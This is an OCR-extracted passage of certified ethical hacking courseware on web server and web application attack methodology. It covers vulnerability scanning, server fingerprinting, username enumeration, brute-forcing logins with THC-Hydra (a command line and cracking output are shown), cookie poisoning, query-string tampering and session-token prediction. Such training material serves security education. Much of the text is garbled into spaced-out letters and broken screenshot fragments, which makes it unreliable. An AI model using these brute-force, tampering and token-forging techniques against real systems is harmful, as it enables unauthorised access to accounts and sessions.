—5. O n c e t h e a t t a c k e r id e n t if ie s t h e w e b s e rv e r e n v i r o n m e n t , a t ta c k e r s scan f o r k n o w n
v u ln e r a b i l it ie s by u sin g a w e b s e r v e r v u l n e r a b i l i t y s c a n n e r. V u l n e r a b i l i t y s c a n n in g h e lp s t h e
a t t a c k e r t o la u n c h t h e a t t a c k e a sily b y i d e n t i f y i n g t h e e x p l o i t a b l e v u ln e r a b i l it ie s p r e s e n t o n t h e
w e b s e rv e r. O n c e t h e a t t a c k e r g a th e r s all t h e p o t e n t i a l v u l n e r a b i l i t i e s , he o r sh e tr ie s t o e x p l o i t
t h e m w i t h t h e h e lp o f v a r io u s a t t a c k t e c h n i q u e s t o c o m p r o m i s e t h e w e b s e rv e r. In o r d e r t o s to p
t h e w e b s e rv e r f r o m s e rv in g l e g i t i m a t e users o r c lie n ts , t h e a t t a c k e r la u n c h e s a DoS a t ta c k
a g a in s t t h e w e b s e rv e r. You can la u n c h a tta c k s o n t h e v u ln e r a b l e w e b s e r v e r w i t h t h e h e lp o f
t o o l s such as U rIScan, N ik to , Nessus, A c u n e t i x W e b V u l n e r a b i l i t y S c a n n e r, W e b ln s p e c t , e tc.
W e b S e r v e r H a c k in g T o o l:
CEH
W e b ln s p e c t
J W e b ln s p e c t id e n tifie s s e c u r it y
v u l n e r a b il it ie s in t h e w e b
a p p lic a tio n s
J I t ru n s in t e r a c t iv e s c a n s u s in g
a s o p h is tic a te d u s e r in te r fa c e
W e b s e r v e r H a c k in g T o o l: W e b ln s p e c t
S o u rc e : h t t p s : / / d o w n l o a d . h p s m a r t u p d a t e . c o m
W e b l n s p e c t s o f t w a r e is w e b a p p li c a t i o n s e c u r it y a s s e s s m e n t s o f t w a r e d e s ig n e d t o t h o r o u g h l y
a n a ly z e t o d a y 's c o m p le x web a p p lic a tio n s . It d e liv e r s fa s t s c a n n in g c a p a b i l it ie s , b ro a d
a s s e s s m e n t c o v e r a g e , a n d a c c u r a te w e b a p p li c a t i o n s c a n n in g re s u lts . It id e n t if ie s s e c u r it y
v u ln e r a b i l it ie s th a t a re u n d e te c ta b le by tra d itio n a l scanners. A tta ck e rs can e x p lo it th e
i d e n t i f i e d v u l n e r a b i l it ie s f o r l a u n c h in g w e b s e rv ice s a tta c k s .
—
[ ־OtW
NWI__ j
! !
s !
•**r «M
>*«
■jj>------m Crmtt
F IG U R E 1 3 . 3 6 : W e b l n s p e c t T o o l S c r e e n s o t
W e b A p p H a c k in g M e th o d o lo g y
A n a ly z e W e b A p p lic a tio n s
A n a ly z in g t h e w e b a p p li c a t i o n h e lp s y o u in i d e n t i f y i n g d i f f e r e n t v u ln e r a b l e p o i n t s t h a t can be
e x p l o i t a b l e b y t h e a t t a c k e r f o r c o m p r o m i s i n g t h e w e b a p p l i c a t i o n . D e t a ile d i n f o r m a t i o n a b o u t
a n a ly z in g a w e b a p p li c a t i o n a n d i d e n t i f y i n g t h e e n t r y p o i n t s t o b re a k i n t o t h e w e b a p p li c a t i o n
w i ll be d iscu sse d o n t h e f o l l o w i n g slides.
■ A n a ly z e t h e a c t i v e a p p l i c a t i o n ' s f u n c t i o n a l i t y a n d t e c h n o l o g i e s in o r d e r t o i d e n t i f y t h e a t t a c k
s u r fa c e s t h a t it e x p o s e s
™ j A n a ly z e W e b A p p lic a tio n s
I d e n t i f y E n t r y P o in ts f o r U s e r I n p u t
T h e e n t r y p o i n t o f an a p p li c a t i o n s e rve s as an e n t r y p o i n t f o r a tta c k s ; th e s e e n t r y p o in t s in c lu d e
t h e f r o n t - e n d w e b a p p li c a t i o n t h a t lis te n s f o r HTTP r e q u e s ts . R e v ie w t h e g e n e r a t e d HTTP
r e q u e s t t o i d e n t i f y t h e u s e r i n p u t e n t r y p o in ts .
I d e n t i f y S e r v e r - s id e F u n c t i o n a l i t y
S e r v e r -s id e f u n c t i o n a l i t y r e fe r s t o t h e a b i l it y o f a s e r v e r t h a t e x e c u t e s p r o g r a m s o n o u t p u t w e b
pages. T h o s e a re s c r ip ts t h a t re s id e a n d also a l l o w r u n n i n g i n t e r a c t i v e w e b p ages o r w e b s i t e s
o n p a r t i c u l a r w e b s e rve rs . O b s e r v e t h e a p p li c a t i o n s r e v e a le d t o t h e c l i e n t t o i d e n t i f y t h e s e rv e r-
side s t r u c t u r e a n d f u n c t i o n a l i t y .
I d e n t i f y S e r v e r - s id e T e c h n o l o g i e s
S e r v e r -s id e t e c h n o l o g i e s o r s e r v e r - s id e s c r ip tin g r e fe r s t o t h e d y n a m i c g e n e r a t io n o f w e b pages
t h a t a re s e rv e d by t h e w e b se rv e rs , as t h e y a re o p p o s e d t o s t a t i c w e b p a g e s t h a t a re in t h e
s to r a g e o f t h e s e r v e r a n d s e rv e d t o w e b b r o w s e r s . F i n g e r p r i n t t h e te c h n o l o g i e s a c tiv e o n t h e
s e r v e r u s in g v a r io u s f i n g e r p r i n t t e c h n i q u e s such as HTTP f i n g e r p r i n t i n g .
M a p t h e A t t a c k S u r fa c e
I d e n t i f y t h e v a r io u s a t t a c k s u rfa c e s u n c o v e r e d b y t h e a p p li c a t i o n s a nd t h e v u ln e r a b i l it ie s t h a t
a re a s s o c ia te d w i t h e ach o n e .
A n a ly z e W e b A p p lic a tio n s :
I d e n t if y E n tr y P o in ts fo r U & e r In p u t
U s e r In p u t
Q D u r in g t h e w e b a p p li c a t i o n a na lysis, a t ta c k e r s i d e n t i f y e n t r y p o i n t s f o r u se r i n p u t so t h a t
t h e y can u n d e r s t a n d t h e w a y t h e w e b a p p li c a t i o n a c c e p ts o r h a n d le s t h e u s e r i n p u t .
T h e n t h e a t t a c k e r tr ie s t o f i n d t h e v u ln e r a b i l it ie s p r e s e n t in i n p u t m e c h a n i s m a n d tr ie s
to e x p lo it th e m so t h a t a t t a c k e r can a s s o c ia te w ith o r g ain access t o th e web
a p p lic a t io n . E x a m in e URL, HTTP H e a d e r , q u e r y s t r i n g p a r a m e t e r s , POST d a t a , a nd
c o o k ie s t o d e t e r m i n e all u s e r i n p u t fie ld s .
0 I d e n t i f y HTTP h e a d e r p a r a m e t e r s t h a t can be p ro c e s s e d b y t h e a p p li c a t i o n as u se r
i n p u t s such as U s e r - A g e n t, R e fe r re r, A c c e p t, A c c e p t-L a n g u a g e , a n d H o s t h e a d e rs .
0 D e t e r m i n e URL e n c o d i n g t e c h n i q u e s a n d o t h e r e n c r y p t i o n m e a s u r e s i m p l e m e n t e d t o
s e c u r e t h e w e b t r a f f i c such as SSL.
T h e t o o l s u sed t o a n a ly z e w e b a p p li c a t i o n s t o i d e n t i f y e n t r y p o in t s f o r u s e r i n p u t i n c lu d e B u r p
S u ite , H t t P r i n t , W e b S c a r a b , O W A S P Zed A t t a c k P r o x y , e tc.
S e r v e r - S id e T e c h n o lo g ie s
» PHPSESSID - PHP
U iw http://juggyboy.com/8rror.aspx
MicrosafMIS/6 0 Microxaft-IISJfl 0
O ops!
Apache;2 0.32 !Fedora)
Server Error in ,/ReportServer' Application.
Couldnotfindthepermissionsetnamed'ASP.Net'.
SunONE Webserver 0 0, Net&c«*pe-Er4e<pr*e/4 1
Description:Anunhandedexceptionoccurredduringthe
executionofthecurrentwebrequest. Pleasereviewthestack
\ 1 traceformoreinformationabouttheerrorandwhereit
Micro* oft-IIS'6.0.0 originatedinthecode.
VersionInformation: Microsoft .Net FrameworkVersion
4.0.30319;ASP.NetVersion4.0.30319.1
'> Server Side Technologies < •
T e c h n o lo g ie s
S o u rc e : h t t p : / / n e t - s q u a r e . c o m
A f t e r i d e n t i f y i n g t h e e n t r y p o i n t s t h r o u g h u s e r in p u t s , a t ta c k e r s t r y t o i d e n t i f y s e r v e r - s i d e
te c h n o lo g ie s .
T h e s e rv e r- s id e t e c h n o l o g i e s can be i d e n t i f i e d as f o l lo w s :
1. P e r f o r m a d e t a i le d s e r v e r f i n g e r p r i n t i n g , a n a ly z e HTTP h e a d e rs a nd H T M L s o u r c e c o d e
t o i d e n t i f y s e rv e r side te c h n o l o g i e s
E x a m in e URLs f o r file e x te n s io n s , d ir e c t o r i e s , a n d o t h e r i d e n t i f i c a t i o n i n f o r m a t i o n
E x a m in e t h e e r r o r p age m essa ge s
E x a m in e session t o k e n s :
e JSESSION ID - Java
© ASPSESSION I D - I I S s e r v e r
e A S P .N E T _ S e s s io n lD -A S P .N E T
e PHPSESS I D - P H P
PH
h«p://jueev1>oyr.com/error.aspx
w e b s e rv e r fin g e rp rin tin g re p o rt
F IG U R E 1 3 . 3 7 : I d e n t i f y S e r v e r - S id e T e c h n o lo g ie s
A n a ly z e W e b A p p lic a tio n s : I d e n t if y s* c i ■
Examine pagesource and URLs and make an educated guess to determ ine the
internal structure and functionality of web applications
E x a m in e U R L
F u n c tio n a lity
O n c e t h e s e rv e r- s id e te c h n o l o g i e s a re d e t e r m i n e d , i d e n t i f y t h e s e r v e r - s id e f u n c t i o n a l i t y . This
h e lp s y o u t o f i n d t h e p o t e n t i a l v u l n e r a b i l it ie s in s e r v e r - s id e f u n c t io n a l it ie s . E x a m in e p age
source and URLs a n d make an e d u c a t e d guess t o d e te rm in e th e in te rn a l s tru c tu re a nd
f u n c t i o n a l i t y o f w e b a p p li c a t i o n s .
T o o ls U s e d :
0 % W g e t
—— Sour c e: h t t p : / / w w w . g n u . o r g
T e le p o rt P ro
S o u rc e : h t t p : / / w w w . t e n m a x . c o m
T e l e p o r t Pro is an a ll - p u r p o s e h ig h - s p e e d t o o l f o r g e t t i n g d a ta f r o m t h e I n t e r n e t . L au nch u p t o
t e n s i m u l t a n e o u s r e t r ie v a l th r e a d s , access p a s s w o r d - p r o t e c t e d sites, f i l t e r file s b y size a nd
t y p e , a n d se arch f o r k e y w o r d s . C a p a b le o f r e a d i n g H T M L 4 .0 , CSS 2 .0 , a n d D H T M L , T T e l e p o r t
can f i n d all file s a v a ila b le o n all w e b s i t e s by m e a n s o f w e b s p id e r in g w i t h s e r v e r - s id e im a g e m a p
e x p l o r a t i o n , a u t o m a t i c d ia l - u p c o n n e c t in g , Java a p p le t s u p p o r t , v a r ia b le e x p l o r a t i o n d e p th s ,
p r o je c t s c h e d u lin g , a n d r e lin k in g a b ilitie s .
B la c k W id o w
____ ״ S o u rc e : h t t p : / / s o f t b v t e l a b s . c o m
E x a m in e URL
V
-> D a ta b a s e C o lu m n <•■
F IG U R E 1 3 . 3 8 : B l a c k W id o w
A n a ly z e W e b A p p l i c a t i o n s : M a p
CEH
t h e A t t a c k S u r f a c e Urt1fw4 ilh iu l lUtbM
File U p lo a d a n d
D ire c to ry T ra v e rs a l E rro r M es s a g e I n fo r m a tio n L e a kage
D o w n lo a d
D is p la y o f
C ro s s -S ite S c rip tin g E m a il In te r a c tio n E m a il In je c tio n
U s e r-S u p p lie d D a ta
R e d ire c tio n , H e a d e r
D y n a m ic R e d ire c ts A p p lic a tio n C o des B u ffe r O v e rflo w s
In je c tio n
T h e r e a re v a r io u s e n t r y p o i n t s f o r a tt a c k e r s t o c o m p r o m i s e t h e n e t w o r k , so p r o p e r
a na lys is o f t h e a t t a c k s u rfa c e m u s t be d o n e . T h e m a p p i n g o f t h e a t t a c k s u rfa c e in c lu d e s
t h o r o u g h c h e c k in g o f p o s s ib le v u l n e r a b i l i t i e s t o la u n c h t h e a tta c k . T h e f o l l o w i n g a re t h e
v a r io u s f a c t o r s t h r o u g h w h i c h an a t t a c k e r c o lle c ts t h e i n f o r m a t i o n a n d p la n s t h e k in d o f a t ta c k
t o b e la u n c h e d .
Display of
Cross-Site Scripting Email Interaction Email Injection
User-Supplied Data
Redirection, Header
Dynamic Redirects Application Codes Buffer Overflows
Injection
F IG U R E 1 3 . 3 9 : M a p t h e A t t a c k S u r f a c e
W e b A p p H a c k in g M e th o d o lo g y
__
A t t a c k A u t h e n t i c a t io n
CEH
M e c h a n i s m
U s e r N a m e E n u m e ra tio n
U ser n a m e s can be e n u m e r a t e d in t w o w a y s ; o n e is v e r b o s e f a i l u r e m e s s a g e s a n d t h e
o t h e r is p r e d i c t a b l e u s e r n a m e s .
V e rb o s e F a ilu re M e s s a g e
— ' In a t y p ic a l lo g in s y s te m , t h e u s e r is r e q u i r e d t o e n t e r t w o p ie ces o f i n f o r m a t i o n , t h a t
is, u s e r n a m e a n d p a s s w o r d . In s o m e cases, an a p p li c a t i o n w ill ask f o r s o m e m o r e
i n f o r m a t i o n . If t h e u s e r is t r y i n g t o log in a n d fa ils, t h e n it can be in f e r r e d t h a t a t le a s t o n e o f
t h e p ie ce s o f t h e i n f o r m a t i o n t h a t is p r o v id e d by t h e u s e r is i n c o r r e c t o r i n c o n s i s t e n t w i t h th e
o t h e r i n f o r m a t i o n p r o v id e d by t h e user. T h e a p p li c a t i o n d is clo ses t h a t p a r t i c u l a r i n f o r m a t i o n
t h a t is p r o v id e d by t h e u s e r w a s i n c o r r e c t o r in c o n s is t e n t ; it w ill be p r o v id i n g g r o u n d f o r an
a t t a c k e r t o e x p l o i t t h e a p p li c a t i o n .
E x a m p le :
© T h e p a s s w o r d p r o v id e d i n c o r r e c t
P re d ic ta b le U s e r N a m e s
S o m e o f t h e a p p li c a t i o n s a u t o m a t i c a l l y g e n e r a t e a c c o u n t u s e r n a m e s a c c o r d in g t o
s o m e p r e d i c t a b l e s e q u e n c e . T his m a k e s it v e r y easy w a y f o r t h e a t t a c k e r w h o can
d is c e rn t h e s e q u e n c e f o r p o t e n t i a l e x h a u s tiv e list o f all v a l i d u s e r n a m e s .
P a s s w o rd A tta c k s
P a s s w o rd s a re c r a c k e d based o n :
© P a s s w o rd f u n c t i o n a l i t y e x p lo its
© P a s s w o rd g u e s sin g
© B r u t e - f o r c e a tta c k s
S e s s io n A t t a c k s
© Session p r e d i c t i o n
© Session b r u t e - f o r c i n g
© Session p o is o n in g
C o o k ie E x p lo ita tio n
T h e f o l l o w i n g a re t h e ty p e s o f c o o k ie e x p l o i t a t i o n a tta c k s :
© C o o k ie p o is o n in g
© C o o k ie s n if fin g
© C o o k ie r e p la y
I f lo g in e rro r s ta te s w h ic h p a rt o f th e u s e r n a m e a n d p a s s w o rd is n o t c o rre c t, g u e s s
th e u s e rs o f th e a p p lic a tio n u s in g t h e tr ia l- a n d - e r r o r m e th o d
U s e r N a m e E n u m e r a tio n
S o u rc e : h ttp s ://w o r d p r e s s .c o m
W o r d P r e s s .c o m W o r d P r e s s .c o m
Em ail o r u s e rn a m e
Em ail o r U sernam e
rin i.m a tth e w s
r in im a tth e w s
P assw ord
P assw ord
□ Remember Me
Log In □ Remember Me
Log In
U sernam e rin i.m a tth e w s does n o t exist U sernam e successfully e nu m e ra te d to rin im a tth e w s
F IG U R E 1 3 .4 0 : U s e r N a m e E n u m e r a tio n
A tta c k e rs c a n use an e n u m e ra te d u s e r n a m e o r p re d ic t th e
session id e n tifie r t o b y p a s s a u th e n tic a tio n m e c h a n is m s
P a s s w o r d C h a n g in g
P a s s w o rd R e c o v e ry
R e m e m b e r M e E x p lo it
R e m e m b e r M e fu n c tio n s a re im p le m e n te d u s in g a s im p le p e r s is te n t c o o k ie , su ch as
R e m e m b e rU s e r= ja s o n o r a p e r s is te n t se ssio n id e n t if ie r such as R e m e m b e rU s e r= A B Y 1 1 2 0 1 0 .
% !0 u it *lout
T arget Pa3swcrdc | T uning | Cpeciffc | Gtart j T a 1g«l P a ssw crts |T un.ng |0 p e c ific Gtart |
Usernam e O u to jt
H ydra v4 * (c) 5 0 0 4 by v a n M a u s e r /T H C • u s e allo׳A/Pd only for legal p u r p o s e s
( • Usernam e test!
H y d ׳a (tv to . •vw.ua Ihc erg) sta rlin g at 2 004-05-17 5 1 :58:52
C Usom am o Lict [D A ' AJ 3 2 ta s k s . 1 se rv e rs , 4 5 3 8 0 login trie s (l:1/p:45380). ~ 1418 trie s p e r ta s k
[ d a t a ] a r a c k n g s e rv ic e ftp on port 21
(STATUS] 14055.00Ules/min. 14050IrlesIn00:01h. 31324lexfoIn00:031)
C Password [STATUS] 14513.00ifles/min. 29020triesIn00:0211. 15354tcxioIn00.0211
[2 [] וTip] h o s t: 127.0.0.1 lo g in : m a rc p a s s w o r d : s u c c e s s
<* Passv/ora List Hyda(Mp.//*#swlhcerg)finisheda! 2004-05-1722:01:38
< r1 n lsh e d >
C olo r separated rile
- ■ P a s s w o rd A tta c k s : P a s s w o rd G u e s s in g
J1=S
- P a ssw o rd g u e s s in g is a m e th o d w h e re an a tta c k e r g u e sses v a rio u s p a s s w o rd s u n til he
o r she g e ts th e c o rr e c t p a s s w o rd s b y u s in g th e fo llo w in g m e th o d s : p a s s w o rd lis t, p a s s w o rd
d ic tio n a r y , a n d v a rio u s to o ls .
P a s s w o rd D ic tio n a r y
T o o ls U s e d f o r P a s s w o r d G u e s s in g
T H C -H y d ra
S o u rc e : h t t p : / / w w w . t h c . o r g
TH C -H YD R A is a n e tw o r k lo g o n c ra c k e r t h a t s u p p o rts m a n y d if f e r e n t s e rv ic e s . T h is to o l is a
p r o o f o f c o n c e p t c o d e , to g iv e re s e a rc h e rs a n d s e c u r ity c o n s u lta n ts th e p o s s ib ility t o s h o w h o w
e asy it w o u ld be to g a in u n a u th o riz e d r e m o te access t o a s y s te m .
(• U s e rn a m e |te s tu s e t
H y d ra v 4 1 (c ) 2 0 0 4 b y v a n H a u s e r / THC ־u s e a llo w e d o n ly fo r le g a l p u rp o s e s .
H y d ra ( h t t p / . w w w .th c o rg ) s ta rtin g at 2 0 0 4 -0 5 *1 7 21 ;5 8 :5 2
C U s e r n a m e L is t [D A T A ] 3 2 t a s k s . 1 s e r v e rs . 4 5 3 8 0 lo g in tr ie s ( l:1 /p :4 5 3 8 0 ). ~ 1 4 1 8 t r ie s p e r t a s k
[D A T A ] a tta c k in g s e r v ic e f t p o n p o rt 21
p a s s w o ra
[S T A T U S ] 1 4 0 5 6 .0 0 tn e s 'm in , 1 4 0 5 6 t r ie s in 0 0 :0 1 h . 3 1 3 2 4 to d o in 0 0 :0 3 h
C P a s s w o rd [S T A T U S ] 1 4 5 1 3 .0 0 tn e s ^ m in . 2 9 0 2 6 tr ie s in 0 0 :0 2 h . 1 6 3 5 4 to d o in 0 0 :0 2 h
[21 ][T ip ] h o s t : 1 2 7 .0 .0 .1 lo g in : m a rc p a s s w o rd : su c c e s s
<• P a s s w o r d L is t | / t m p / p a s s lis t. tx t H y d ra ( h l t p / . ,w w w .th c o rg ) fin is h e d a t 2 0 0 4 -0 5 -1 7 2 2 :0 1 .3 8
< f ln is h e d >
C d o n s e p e r a te d file
U s e C o lo n s e p e r a te d file
(7 T r y lo g in a s p a s s w o r d F T r y e m p ty p a s s w o r d S f a r lj S to p j r.ove O u tp u t | C le a r O u tp u t |
f i y d r a 1 2 7 .0 .0 .1 f t p •1 te s tu s e r •P /t m p / p a s s lis t . t x t ■e n s ^ 1y d r a 1 2 7 .0 0.1 f t p 1 ־m a rc -P /t m p / p a s s lis t . t x t ■e n s -t 3 2
F IG U R E 1 3 .4 1 : T H C -H y d ra T o o l S c re e n s h o t
C o p y r ig h t © by E&Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
P a s s w o rd A tta c k s : B ru te F o r c in g
wcav 1 1 B r u t e f o r c e is o n e o f t h e m e t h o d s u s e d f o r c r a c k i n g p a s s w o r d s . In a b r u t e f o r c i n g
a t t a c k , a t t a c k e r s c r a c k t h e l o g in p a s s w o r d s b y t r y i n g all p o s s i b l e v a l u e s f r o m a s e t o f a l p h a b e t ,
n u m e ric , and s p e cia l c h a ra cte rs. T he m a in lim ita tio n o f th e b ru te fo rc e a tta c k is t h i s is
b e n e f i c i a l in i d e n t i f y i n g s m a l l p a s s w o r d s o f t w o c h a r a c t e r s . G u e s s i n g b e c o m e s m o r e c r u c i a l
w h e n t h e p a s s w o r d l e n g t h is l o n g e r a n d a ls o i f i t c o n t a i n s l e t t e r s w i t h b o t h u p p e r a n d l o w e r
c a s e . If n u m b e r s a n d s y m b o l s a r e u s e d , t h e n i t m i g h t e v e n t a k e m o r e t h a n a f e w y e a r s t o g u e s s
t h e p a s s w o r d , w h i c h is a l m o s t p r a c t i c a l l y i m p o s s i b l e . C o m m o n l y u s e d p a s s w o r d c r a c k i n g t o o l s
b y a t t a c k e r s i n c l u d e B u r p S u it e 's I n t r u d e r , B r u t u s , S e n s e p o s t ' s C r o w b a r , e tc .
B u rp S u it e 's I n t r u d e r
• > S ource: h t t p : / / p o r t s w ig g e r . n e t
B u r p I n t r u d e r is a m o d u l e o f B u r p S u i t e . It e n a b l e s t h e u s e r t o a u t o m a t i z e p e n t e s t i n g o n w e b
a p p lic a tio n s .
max length
p a y lo a d p r o c e s s in g r u le s
to uppercase
F IG U R E 1 3 .4 2 : B u rp S u it e 's In tru d e r T o o l S c re e n s h o t
B ru tu s
S ource: h t t p : / / w w w . h o o b i e . n e t
B r u t u s is a r e m o t e p a s s w o r d c r a c k i n g t o o l . B r u t u s s u p p o r t s HTTP, P O P 3 , FTP, S M B , T e l n e t ,
I M A P , N N T P , a n d m a n y o t h e r a u t h e n t i c a t i o n t y p e s . It i n c l u d e s a m u l t i - s t a g e a u t h e n t i c a t i o n
e n g in e a n d can m a k e 60 s im u lta n e o u s t a r g e t c o n n e c tio n s .
B ru tu s - A E T 2 - w w w . h o o b ie . n e t / b r u t u s - (J a n u a ry 2 0 0 0 ) < ־
F ile T o o ls H e lp
Connection Options
Authentication Options
FIGURE 1 3 .4 3 : B r u tu s T o o l S c r e e n s h o t
C o p y r ig h t © b y EC-Couactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
S e s s io n A tta c k s : S e s s io n ID P r e d ic tio n /B r u te F o r c in g
R e f e r e r : h t t p : / / l a n a i n a : 8 1 8 0 /W e b G o a t/a t ta c k ? S c r e e n = 1 7 & m e n u = 4 1 0
C o o k ie ; JS E S S IO N ID = u ser0 1 ♦י................................................................................. Predictable SessionCookie
A u th o r iz a tio n : B a sic 2 3 V ic 3 Q 6 2 3 V lc 3 Q
F IG U R E 1 3 .4 4 : S e s s io n ID P r e d ic tio n /B r u t e F o r c in g
A tta c k e rs c a n t r a p c o o k ie s u s in g to o ls s u c h as O W A S P Z e d A t t a c k P ro x y , B u rp S u ite , e tc .
— '■J M J U j U B i
itt_____ *
H i - * " 1*1 C
.: _ ו וM c x ilW S .C IS ia dc י.* t t € .2 ; EHK«4t A ppl«V eb K it/537.4 (KETKL it—19: 1
_
I l k • Scckol Cfcr0K */2 2 . 0 . 12 2 » .9 4 S«C«X1 /5 3 7 .4
C ach e-C onti0 1 : oax-aoe=0
A ccep t! • / •
Rererer: ntcr://in.yonoc.oca»/?p^;3
A ee ep t-E n c cd in g : a deft
A c c ep t-L a n ^ u iq v : c n -U S ,« n ;q ^ > .9
A c c v p t-C h a sa v t: X SO -S559-1.at£-S ;<f-C . 7 , • j q - 0 .3
C oo k l•: a<Uld015S24S9e12Sar4e: « < u r-:3 S 4 « U ~ C m 3 :
Hoats ti.a d ls ie z a x .c o a
Current Scans 0
URI found during aa*M
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n Is S t r i c t l y P r o h ib it e d
C o o k ie E x p lo ita tio n : C o o k ie P o is o n in g
[® [י O W A S P Z e d A tta c k P ro x y
S o u rc e : h ttp s ://w w w .o w a s p .o r g
O U n t i t l e d S e s s io n - O W A S P Z A P _ 1 _ 1 ם x 1
| £ ile E d it v i e w A n a ly s e R e p o r t T o o ls H e lp
H e a d e r: T e x t * j Body: T ext T
» f=■ h ttp //tr a d in te
U s e r-A g e n t: M o z illa / 5 . 0 ( W in d o w s NT 6 .2 ; W O W 6 4) A p p le W e b K it/ 5 3 7 .4 (K H T M L , 4
» y tr
lllc e G ecko) C h ro m e /2 2 .0 .1 2 2 9 .9 4 S a fa r l/S 3 7 .4 ►
►U yahoo_
C a c h e - C o n tr o l: m a x -a g e _ 0 k
A c c e p t: * /*
R e fe re r: h t tp : //in . y a h o o .c o m /? p “ u s
A c c e p t - E n c o d in g : sdch
A c c e p t-L a n g u a g e : e n - O S ,e n ;q “ 0 .8
A c c e p t-C h a rs e t: 1 s 0 -8 8 s 9 ־l, u t f - 8 ; q - 0 . 7 , * ; q - 0 . 3 *׳
C o o k ie : a d x id - 0 1 5 8 2 4 5 0 6 1 2 S a f4 6 ; a d x f-1 0 8 4 6 6 6 7 e 1 6 6 3 2
H o s t: tr .a d in t e r a x .c o m *
H is to r y “ | S e a rc h \ | B r e a k P o in ts \ A le rts
A c tiv e S c a n J ^ S p id e r ^ : J B ru te F o r c e - [ P o rt S c a n ] F uzzer £ ] P a ra m s [ 3 J O u tp u t
U R I fo u n d d u r in g c ra w l:
U R I fo u n d b u t o u t o f c r a w l s c o p e :
F ig u r e 1 3 .4 5 : O W A S P Z e d A tta c k P ro x y T o o l S c re e n s h o t
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p H a c k in g M e t h o d o lo g y
AuthorizationAttack CEH
C«rt1fW4 itfciul Nm Im
Q u e ry S t r in g H id d e n Tags
C o p y r ig h t © b y EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
A u th o r iz a tio n A tta c k
P a r a m e te r T a m p e r in g
lE P P o s tD a ta
P ost d a ta o fte n is c o m p ris e d o f a u th o r iz a tio n a n d se ssio n in fo r m a tio n , sin c e in m o s t
o f th e a p p lic a tio n s , th e in fo r m a tio n t h a t is p ro v id e d b y th e c lie n t m u s t be a s s o c ia te d
H T T P R e q u e s t T a m p e r in g CEH
Q u e ry S trin g T a m p e rin g
J I f t h e q u e r y s tr in g is v is ib le in t h e a d d re s s b a r o n t h e b r o w s e r, t h e a tta c k e r c a n e a s ily c h a n g e t h e
s tr in g p a r a m e te r t o b y p a s s a u t h o r iz a t io n m e c h a n is m s
h t t p s : / / ju g g y s h o p . c o m /b o o k s /d o w n lo a d /8 5 2 7 4 1 3 6 9 . p d f
h t t p s : / / ju g g y b a n k . c o m /lo g in / h o m e . js p ? a d m in = t r u e
J A tta c k e rs c a n u s e w e b s p id e r in g to o ls s u c h as B u r p S u ite t o s c a n t h e w e b a p p f o r PO ST p a r a m e te rs
H TTP H e a d e rs
J I f t h e a p p lic a tio n u se s t h e R e fe r e r h e a d e r f o r m a k in g acc e s s c o n t r o l d e c is io n s , a tta c k e rs c a n m o d if y it
t o acc e s s p r o t e c t e d a p p lic a t io n f u n c t i o n a l it ie s
C o p y r ig h t © by EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
H T T P R e q u e s t T a m p e r in g
Q u e r y S tr in g T a m p e r in g
F IG U R E 1 3 .4 6 : Q u e ry S t r in g T a m p e r in g
H T T P H e a d e rs
F IG U R E 1 3 .4 7 : H T T P H e a d e rs
h ttp s ://w w w .o w a s p .o rg
C o p y r ig h t © b y EC-Gauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
S o u rc e : h ttp s ://w w w .o w a s p .o r g
C o p y r ig h t © by EC-Cauactl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
W e b A p p H a c k in g M e th o d o lo g y
A tta c k S e s s io n M a n a g e m e n t M e c h a n is m
S e s s io n M a n a g e m e n t A t t a c k
S e s s io n M a n a g e m e n t A tta c k
0 S ession T o k e n s P re d ic tio n
© S ession T o k e n s T a m p e rin g
0 S ession H ija c k in g
© S ession R e p la y
Q M a n -ln -T h e - M id d le A tta c k
W e a k E n c o d in g E x a m p le
h t t p s : //w w w . ju g g y b o y . c o m /c h e c k o u t?
S e s s io n T o k e n = % 7 5 % 7 3 % 6 5 % 7 2 % 3 D % 6 A % 6 1 % 7 3 % 6 F % 6 E % 3 B % 6 1 % 7 0 % 7 0 % 3 D % 6 1 % 6 4 % 6 D % 6 9 % 6 E % 3 B % 6
4 % 6 1 % 7 4 % 6 5 % 3 D % 3 2 % 3 3 % 2 F % 3 1 % 3 1 % 2 F % 3 2 % 3 0 % 3 1 % 3 0
W h e n h e x - e n c o d in g o f an AS C II s tr in g user=jason;app=admin;date=23/ll/201
s e s s io n to k e n b y ju s t c h a n g in g d a te a n d u s e it f o r a n o th e r tr a n s a c tio n w it h s e r v e r
S e s s io n T o k e n P r e d ic t io n
a n a ly z in g it f o r e n c o d in g ( h e x - e n c o d in g , B a s e 6 4 ) o r a n y p a tte rn
A tta c k e rs th e n m a k e a la r g e n u m b e r o f re q u e s ts w ith th e p r e d ic te d to k e n s to a s e s s io n - d e p e n d e n t
p a g e to d e te r m in e a v a lid s e s s io n to k e n
C o p y r ig h t © b y E&CsiMCtl. A l l R ig h ts R e s e r v e d . R e p r o d u c t io n i s S t r i c t l y P r o h i b i t e d .
A tta c k in g S e s s io n T o k e n G e n e r a tio n M e c h a n is m
W e a k E n c o d in g E x a m p le
G
h t t p s : / / w w w . ju g g y b o y . c o m / c h e c k o u t ?
SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%
64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30
W h e n h e x -e n c o d in g o f an ASCII s tr in g u s e r = j a s o n ; a p p = a d m i n ; d a t e = 2 3 / l l / 2 0 l 0 , th e a tta c k e r
can p re d ic t a n o th e r se ssio n to k e n b y ju s t c h a n g in g th e d a te a n d u s in g it f o r a n o th e r tr a n s a c tio n
w ith th e s e rv e r.
S e s s io n T o k e n P r e d ic t io n
A tta c k in g S e s s io n T o k e n s
